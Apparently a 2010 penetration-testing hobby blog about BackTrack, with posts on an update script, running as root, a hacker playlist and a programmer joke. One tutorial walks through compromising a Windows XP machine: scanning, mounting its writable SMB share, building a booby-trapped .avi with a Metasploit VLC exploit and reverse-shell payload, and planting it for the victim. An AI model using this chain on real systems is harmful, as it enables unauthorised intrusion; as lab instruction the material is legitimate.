Thursday, November 18, 2010

Update_bt.py script.

Well I recently started learning python and at first I just wanted to see if I could do a basic update script and this is what came up

Hope you like it also I would appreciate some suggestions about what else it should contain.
It includes internet connectivity check,
This script currently:
* Upgrades/Cleans Backtrack
* Exploits: Metasploit2,3, Exploit-db, SET, FastTrack
* Vulnerability Scanners: OpenVAS, Nikto, W3AF, Nessus (if you have it)
* Wireless: Aircrack, Airodump, Kismet, Gerix

All of the following sections are included into different menus.






EDIT: Well I have taken in consideration the suggestions I received via PM so I rewrote the script and included categories and more tools, here you go:

bt_up.tar.gz

Wednesday, September 8, 2010

Running as root !?

Ok so a lot of you people like using Backtrack and now that it's debian based and it is possible to use it as a daily OS things have changed a bit.

Now as you know there are a few guides on how to make an unprivileged user in Backtrack.
Unprivileged user in BT
Normally it's good to make an unprivileged users but I must remind you that Backtrack is not a normal OS, most of it's applications must be run as root, it was basically made to run as root and nothing else.
If you ask people if it's ok to run as root, you will get an answer similar to this one: "It's not safe to run as root!", but did anyone tell you why ? or when is it safe to run as root ?

I'm going to try to clarify the risks and all that stuff regarding "Running as root".
Keep in mind that what I am saying here applies to normal desktop PC's or laptops, not servers ....

Ok so let's begin:

Running as root has a bright side as well as a dark side:

***BRIGHT SIDE***

As you know the "root" account on a *nix system is the most privileged account. This account allows you to do anything you want without asking questions like: changing passwords, installing applications, adding accounts, etc. The computer does not hassle you with confirmations and questions because it thinks you know what you are doing ... so if you don't log out now!
This is a good thing because it does not bother you to type sudo for everything which gets annoying after a while.

***DARK SIDE***

Now a lot of people are afraid to run as root, because they might break something ... and this is true, if you run as root and have no clue about what you are doing you might end up with 3 reinstalls per day.
Running as root is not for everyone, you need some advanced skills in using the bash + some advanced knowledge about *nix. Oh and if you can't play in the bash without typing "rm -rf /*" every 20 seconds then close this window and stop reading for your own safety.

So base line. If you are not sure you can handle it and don't want to accidentally lose your important data or stuff don't run as root.

Another thing in running as root, people often say that you should not run as root for security reasons, this is also true. If an attacker gets hold of your system he will be root and he could do anything with your PC, but now I ask you ... how many services do you need running 24/7 on your home PC/laptop ?

Sure there are other ways of getting access to your system, like if you are in a LAN with others, they could try a MITM and maybe sniff your credentials but there are programs to protect you from this kind of attacks, you can even use ettercap for this or arpwatch, I'm sure if you google this things you will come up with something.
Other methods would be to set an ev!l server with metasploit or SET and trick you in clicking it or send an email with some malicious .pdf or I don't know, now if you know you would click every link people give you and read every attachment on your email without scanning it ... close the windows NOW!

Now this are some of the security risks that you need to be aware of when running as root.
Oh and one last thing don't think that if you're not running as root you are completely bullet proof !

Saturday, September 4, 2010

Sickness - Owning a windows xp with metasploit.



Ok so first of all I did not do any video editing, so don't complain about it !
Second of all excuse me if I made some English mistakes I'm not a perfect English speaker.
Third this is a basic video.

So in this tutorial I am going to show you how to own a windows XP SP2 who has the folder "My Documents" shared with read/write permissions by uploading an infected .avi file to the victim's machine.

The tools used: fping, nmap, metasploit, inguma

Commands:
Code:

fping -g 192.168.1.60 192.168.1.70
nmap -sS -sV -f -n -O 192.168.1.66
cd /pentest/exploits/framework3/
./msfconsole
cd /pentest/exploits/inguma
./inguma.py
autoscan
192.168.1.66
y
n
cd /pentest/python/impacket-examples/
./smbclient
open 192.168.1.66
login username password
shares
smbmount //192.168.1.66/Documents /media/
cd /media/
ls

Metasploit commands (making the infected .avi):
Code:

search vlc
use windows/fileformat/videolan_tivo
set PAYLOAD windows/shell_reverse_tcp
show options
set FILENAME watch_me.avi
set OUTPUTPATH /root/sickness/desktop/
set LHOST 192.168.1.64
exploit

Metasploit handler:
Code:

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.64
exploit

Code:

cd /root/sickness/desktop
mv -f watch_me.avi /media/Downloads
smbumount /media

Wednesday, September 1, 2010

Backtrack Products.

Well it seems like my 3-4 month signature on the Backtrack forum "I wans a Backtrack T-Shirt!" finally paid off.
This morning archangelamael just told me that I could buy one and a lot of more Backtrack accessories, but why not take a look yourself.

Backtrack Shop

Monday, August 30, 2010

16 songs for evil hax0rz !!!

Ok so rule number 1: "If you want to be an evil hax0r you have to listen to good music!" so here is a list of songs for hax0rz with youtube links:

1.Mushroomhead - Sun doesn't rise(Searching google)
2.Mushroomhead - Solitaire Unraveling(Nmap scan)
3.Infected Mushroom - Heavyweight(Nessus & NeXpose)
4.The Qemists - Stompbox (Spor Remix)(Putting info together)
5.Mt Eden Dubstep - Prodigy : Omen(Found a nice vulnerability)
6.In Flames - My sweet shadow(When you are bruteforcing)
7.In Flames - Cloud Connected(Wireless cracking)
8.Megadeth - Symphony of Destruction(Buffer Overflow)MEGADETH RULZZZ
9.Megadeth - Trust(Sniffing)THEY RULE AGAIN :X
10. Pantera - Walk(Pivoting)
11.Children of Bodom - Angels Don't Kill(Preparing for a social engineer attack)
12.Soilwork - Nerve(Cracking a hash)
13.Metallica - Fade to black(When your internet connection falls)Metallica rule 2 !!
14.AC/DC - Back in Black (especially for blackhats)
15.AC/DC - Stiff upper lip (after a successful pentest)
16.Disturbed - Pain Redefined(When you present the pentest report and show the world how evil you are!)

The songs are not in the order of my liking, they have a random place.
If you know more songs feel free to comment here including a youtube link and a "moment" of listening !

Blog status updated !!

Ok now as you have all been seeing, lately I haven't posted a lot and there is a reason for that. I was on vacation and did not take anything related to technology with me.

Well now that I am back things will change, I've already prepared some nice posts and started remaking the tutorials and edit them properly and I have also been referring my tutorials on Securitytube so hopefully there will be more video tutorials for you to watch.

However the first priority is to finish remaking my tutorials.

Oh and one last thing, I appreciate your comments and visits, hope I can post more stuff that you guys like !

.NET vs Java programmers !

A group OF 4 Microsoft .NET programmers AND a group OF 4 Java programmers are going ON a train to AN expo. The MS programmers buy a ticket each, AND then watch the Java programmers proceed to buy one ticket between them.

The MS programmers are intrigued AND when they get ON the train, they watch the Java programmers to see what they do when the guard comes to check the tickets. It turns out that, before the guard comes, they all cram into the toilet. The guard knocks ON the door, AND asks for the ticket. The guard takes it from under the door, AND slides it back.

The MS programmers are all impressed, SO ON the way back, they buy only one ticket. Only to watch the Java folks get ON the train without buying a ticket AT all.

When they get ON the train, the MS people cram into the toilet, as they saw the Java folks ON the earlier journey. The Java programmers then knock ON the door, AND say "Ticket please". The MS programmers slide the ticket under the door, as they saw the Java programmers do earlier.

"Thank you", they say. "You steal our methods, but you don't understand them."

Friday, August 27, 2010

Metasploit Unleashed – Updates

So I guess the rumors are true :) the Metasploit Unleashed course will be updated on a monthly basis.
We can expect a whole lot of new content being added onto the Metasploit Unleashed Wiki in the next few months, for now they have added 9 new sections.

You can find the course at : Metasploit_unleashed
Source: www.offensive-security.com